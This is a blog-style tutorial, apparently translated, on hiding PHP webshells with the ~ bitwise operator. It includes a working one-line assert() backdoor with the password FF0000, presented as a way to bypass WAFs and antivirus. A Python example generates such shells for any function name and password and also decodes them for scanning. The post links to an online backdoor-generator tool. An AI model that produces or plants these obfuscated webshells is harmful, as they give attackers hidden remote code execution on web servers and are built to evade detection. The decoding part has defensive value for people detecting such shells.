Using PHP bitwise inversion (~) to build function-call backdoors: an obfuscated webshell variant

Source: Internet
Author: User
Tags: bitwise operators


1) The PHP ~ bitwise operator

Some time ago, a foreign researcher posted something interesting on Twitter: a string that looked like garbage characters, yet when PHP executed it, it printed 1337 as normal.

PHP manual, bitwise operators: http://www.php.net/manual/zh/language.operators.bitwise.php

~ $a  Not (bitwise inversion): bits that are set to 1 in $a are set to 0, and vice versa. Applied to a string, PHP inverts every byte of that string, so the result is another string whose bytes are the one's complement of the original.

The error_reporting directive in php.ini is a real-world example of clearing a bit with ~: the usual setting is "report all errors except notices".

php.ini writes this as: E_ALL & ~E_NOTICE

Step by step: first take the value of E_ALL (30719 on PHP 5.3, where E_STRICT is not part of E_ALL): 00000000000000000111011111111111

Then take the value of E_NOTICE (8): 00000000000000000000000000001000

Invert it with ~: 11111111111111111111111111110111

Finally, bitwise AND (&) keeps only the bits set to 1 in both values, which clears exactly the E_NOTICE bit: 00000000000000000111011111110111

2) Analysis and reproduction

The original post showed the snippet being run: the string of apparently garbled characters executed and printed 1337 (the original included a screenshot of this output).

Seeing this effect, the first thought is to use it for backdoors that bypass WAFs and similar filters; the next question is which encoding the garbled string is in.

Later, while testing with Li Pujun, I simply ran echo ~'1'; and similar statements, and the 'garbled' characters shown above were printed directly.

Then we can write a one-liner webshell to try out the effect:

<?php $x = ~'Ÿ¬¬º­«'; $x($_POST[~'¹¹ÏÏÏÏ']); ?>

Here the variable $x becomes ASSERT: the six bytes BE AC AC BA AD AB are ~'ASSERT' (displayed as ISO-8859-15; the fifth byte, 0xAD, is a soft hyphen and is invisible in most editors). The password is FF0000, since ~'FF0000' is B9 B9 CF CF CF CF. The backdoor can be connected to directly, because inverting the bits once produces the 'garbled' bytes and inverting them again at runtime returns the original value. Note that this relies on assert() evaluating a string argument as PHP code, which holds in PHP 5 and 7 (deprecated since 7.2) but no longer in PHP 8, where a string passed to assert() is not evaluated.

3) Encoding and AV evasion

When I reproduced this backdoor, I found that copying the one-liner directly into a file gave HTTP status 500. The cause is an encoding problem: the 'garbled' characters above are actually Western European (ISO-8859-15) bytes, and they have to reach the file unchanged.

In practice we have come across many backdoors of this kind that could not be connected to, with the 500 error again caused by encoding. If the editor does not detect the encoding by itself, save the file explicitly as ISO-8859-15 (saving as GBK, UTF-8, or similar will not work, because those encodings rewrite the high bytes and the inverted string no longer decodes to a valid function name).
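The following is an added example, not code from the original post or from its Createbackdoor-1.php script. It reproduces PHP's byte-wise ~ in Python, generalizes the ASSERT / FF0000 one-liner from section 2 to any function name and password, recovers the plaintext from a file's bytes the way a defender scanning a webroot would, and simulates the encoding failure described in this section by re-saving the file as UTF-8. All function names here (php_not, build_one_liner, decode_inverted_literals, resave, function_name_after_resave) are this example's own, and the generated shell bytes are constructed inline.

```python
"""PHP's ~ applied to a string inverts every byte of it.

Added example: it is not code from the original post or its
Createbackdoor-1.php tool. It builds the post's ASSERT / FF0000 one-liner,
decodes such literals from a PHP source file, and shows why re-saving the
file as UTF-8 turns the function name into garbage (the HTTP 500 above).
"""
import re
from typing import List


def php_not(data: bytes) -> bytes:
    """Equivalent of PHP's ~ on a string: one's complement of each byte."""
    return bytes((~b) & 0xFF for b in data)


def build_one_liner(func: str = "ASSERT", pwd: str = "FF0000") -> bytes:
    """Build the post's webshell: <?php $x=~'<~func>'; $x($_POST[~'<~pwd>']); ?>

    Returned as bytes: ~ of any ASCII byte sets the high bit, so the two
    literals are not valid text in any multi-byte encoding.
    """
    return (b"<?php $x = ~'" + php_not(func.encode("ascii"))
            + b"'; $x($_POST[~'" + php_not(pwd.encode("ascii")) + b"']); ?>")


# Defender side: a quoted literal immediately after ~. Inverted ASCII never
# contains a quote byte (0x27 and 0x22 invert to 0xD8 and 0xDD), so the
# non-greedy match up to the closing quote is safe.
INVERTED_LITERAL = re.compile(rb"~\s*(['\"])(.*?)\1", re.DOTALL)


def decode_inverted_literals(source: bytes) -> List[str]:
    """Recover the plaintext of every ~'...' literal in PHP source bytes."""
    return [php_not(lit).decode("ascii", errors="replace")
            for _quote, lit in INVERTED_LITERAL.findall(source)]


def resave(shell: bytes, encoding: str) -> bytes:
    """Simulate an editor that opened the file as ISO-8859-15 and saved it
    in `encoding`. ISO-8859-15 round-trips the bytes; UTF-8 does not."""
    return shell.decode("iso-8859-15").encode(encoding)


def function_name_after_resave(shell: bytes, encoding: str) -> str:
    """The name PHP would try to call after the file is saved in `encoding`."""
    return decode_inverted_literals(resave(shell, encoding))[0]


if __name__ == "__main__":
    shell = build_one_liner()
    print(shell)                                              # raw bytes
    print(decode_inverted_literals(shell))                    # ['ASSERT', 'FF0000']
    print(function_name_after_resave(shell, "iso-8859-15"))   # ASSERT
    print(function_name_after_resave(shell, "utf-8"))         # :G=S=S=E=R=T
```

The UTF-8 result explains the 500 error: every character of the inverted literal gains a lead byte (0xC2 or 0xC5) when re-encoded, and ~0xC2 is '=', so PHP ends up calling a function named ":G=S=S=E=R=T", fails with "Call to undefined function", and the server returns HTTP 500. The same decode_inverted_literals pass over all .php files in a webroot is a cheap way to surface this family of shells, since a legitimate script has little reason to apply ~ to a quoted string of high bytes.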


4) Closing

We wrote a small script to generate these shells easily: http://www.bkjia.com/tools/Createbackdoor-1.php

Usage: Createbackdoor-1.php?pwd=password
